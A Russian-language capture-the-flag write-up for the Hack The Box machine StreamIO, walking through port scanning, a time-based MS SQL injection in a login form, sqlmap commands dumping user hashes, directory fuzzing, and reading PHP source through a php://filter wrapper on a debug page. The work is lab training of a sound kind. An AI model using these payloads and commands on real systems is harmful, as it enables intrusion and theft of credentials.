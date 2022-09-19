В этом рай­тапе мы с тобой про­экс­плу­ати­руем SQL-инъ­екцию в фор­ме авто­риза­ции сай­та и с помощью отла­доч­ной фун­кции заполу­чим исходник сай­та и пол­ный дос­туп к MS SQL. Учет­ку адми­нис­тра­тора зах­ватим через экс­плу­ата­цию пра­ва WriteOwner. В общем, будет инте­рес­но!

Наш подопыт­ный — сред­няя по слож­ности машина StreamIO на осно­ве Windows с пло­щад­ки Hack The Box.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

На­чина­ем, как обыч­но, со ска­ниро­вания пор­тов машины.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та. #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ви­дим мно­го откры­тых пор­тов:

53 — DNS;

80 (HTTP) — веб‑сер­вер Microsoft IIS/10.0;

88 — Kerberos;

135 — служ­ба уда­лен­ного вызова про­цедур (Microsoft RPC). Исполь­зует­ся для опе­раций вза­имо­дей­ствия кон­трол­лер — кон­трол­лер и кон­трол­лер — кли­ент;

139 — служ­ба сеан­сов NetBIOS, NetLogon;

389 — LDAP;

443 (HTTPS) — веб‑сер­вер Microsoft IIS/10.0;

445 — SMB;

464 — служ­ба сме­ны пароля Kerberos;

593 (HTTP-RPC-EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;

636 — LDAP с шиф­ровани­ем SSL или TLS;

1433 — Microsoft SQL Server 2019;

3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;

3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;

3389 — RDP;

5985 — WinRM;

9389 — веб‑служ­бы AD DS.

Ни SMB, ни LDAP ничего пут­ного не отве­тили, к MS SQL дефол­тные учет­ные дан­ные не подош­ли, поэто­му нам остался толь­ко веб. Тем более SSL-сер­тификат для пор­та 443 рас­кры­вает нам еще два домен­ных име­ни, которые мы заносим в файл / etc/ hosts .

10. 10. 11. 158 streamio. htb DC. streamIO. htb watch. streamIO. htb

На пер­вом сай­те находим фор­му авто­риза­ции.

Точка входа

SQL Injection

Так как мы точ­но зна­ем, что на хос­те работа­ет СУБД, сто­ит про­верить некото­рые методы для обхо­да авто­риза­ции. Переби­рать будем по спис­ку с помощью Burp Intruder.

Это ничего не дало, поэто­му поп­робу­ем наг­рузки для поис­ка SQL-инъ­екции. И сра­баты­вает наг­рузка ; WAITFOR DELAY '0: 0: 30 для MS SQL с вре­мен­ной задер­жкой, которую мож­но опре­делить по стол­бцу Response time.

Мы под­твер­дили наличие уяз­вимос­ти, а зна­чит, можем исполь­зовать sqlmap для удоб­ной экс­плу­ата­ции. Спер­ва запус­тим ПО для под­бора наг­рузки и соз­дания шаб­лона.

sqlmap -u https:/ / streamio. htb/ login. php --data = 'username=admin& password=admin' -p username --batch

Те­перь мы можем прис­тупить к получе­нию дан­ных. Пер­вым делом нуж­но узнать наз­вания сущес­тву­ющих БД (параметр --dbs ).

sqlmap -u https:/ / streamio. htb/ login. php --data = 'username=admin& password=admin' -p username --batch --dbs

Тут нас инте­ресу­ют две базы: streamio_backup и STREAMIO . Пер­вую мы прос­мотреть не можем, поэто­му получим таб­лицы вто­рой (параметр --tables ).

sqlmap -u https:/ / streamio. htb/ login. php --data = 'username=admin& password=admin' -p username --batch -D STREAMIO --tables

Сра­зу ста­новит­ся ясно, что сле­дующая цель — таб­лица users . Что­бы не пытать­ся вытащить все дан­ные, поп­робу­ем получить наз­вания колонок (параметр --columns ).

sqlmap -u https:/ / streamio. htb/ login. php --data = 'username=admin& password=admin' -p username --batch -D STREAMIO -T users --columns

sqlmap -u https:/ / streamio. htb/ login. php --data = 'username=admin& password=admin' -p username --batch -D STREAMIO -T users -C username, password --dump

Те­перь получим дан­ные (параметр --dump ) толь­ко из колонок username и password .

У нас очень мно­го хешей, пред­положи­тель­но MD5. Что­бы най­ти про­образ, я поль­зуюсь онлай­новым ресур­сом crackstation.net.

В ито­ге мы получа­ем сле­дующие пары логинов и паролей, с которы­ми мож­но попытать­ся авто­ризо­вать­ся на сай­те.

Но, к сожале­нию, дос­туп мы так и не получа­ем. Может, на сай­те есть админка? Что­бы най­ти ее, будем бру­тить катало­ги.

ffuf -u 'https:// streamio. htb/ FUZZ' -t 256 -w directory_ 2. 3_ medium_ lowercase. txt

Есть каталог admin , где мы авто­ризу­емся от име­ни поль­зовате­ля yoshihide .

Точка опоры

У нас есть нес­коль­ко дос­тупных стра­ниц. Но важ­ны не сами стра­ницы, а то, как сер­вер узна­ет, какую заг­рузить, — по име­ни парамет­ра.

С помощью Burp Intruder мы можем проб­рутить наз­вание парамет­ра, что­бы поп­робовать най­ти новые стра­ницы.

В ито­ге опре­деля­ем четыре стра­ницы. Три из них нам уже извес­тны, а вот debug — что‑то новень­кое.

Эта стра­ница дол­жна поз­волять читать фай­лы. Нас инте­ресу­ет код на PHP, а что­бы его получить, нуж­но исполь­зовать обер­тки на PHP. Давай закоди­руем стра­ницу index. php в Base64.

? debug = php:/ / filter/ convert. base64- encode/ resource = index. php

Для декоди­рова­ния выделя­ем инте­ресу­ющий нас текст пря­мо в Burp и нажима­ем Ctrl-Shift-B.